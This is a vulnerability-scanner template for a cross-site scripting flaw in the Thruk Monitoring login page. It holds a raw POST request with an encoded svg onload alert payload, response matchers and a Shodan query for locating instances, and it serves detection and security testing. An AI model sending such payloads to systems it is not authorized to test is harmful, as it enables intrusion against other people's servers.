id: thruk-xss info: name: Thruk Monitoring Webinterface - Cross-Site Scripting author: pikpikcu,ritikchaddha severity: high description: | Thruk Monitoring Webinterface contains a cross-site scripting vulnerability via the login parameter at /thruk/cgi-bin/login.cgi. reference: - https://www.thruk.org/download.html - https://www.usd.de/en/security-advisory-thruk-monitoring-v2-46-3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: verified: true shodan-query: http.html:"Thruk" tags: thruk,xss requests: - raw: - | POST /thruk/cgi-bin/login.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded referer=&login=%22%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%40gmail.com&password=test&submit=Login matchers-condition: and matchers: - type: word words: - "\"@gmail.com') called at" - type: word part: header words: - "text/html" - type: status status: - 500 # Enhanced by mp on 2022/09/23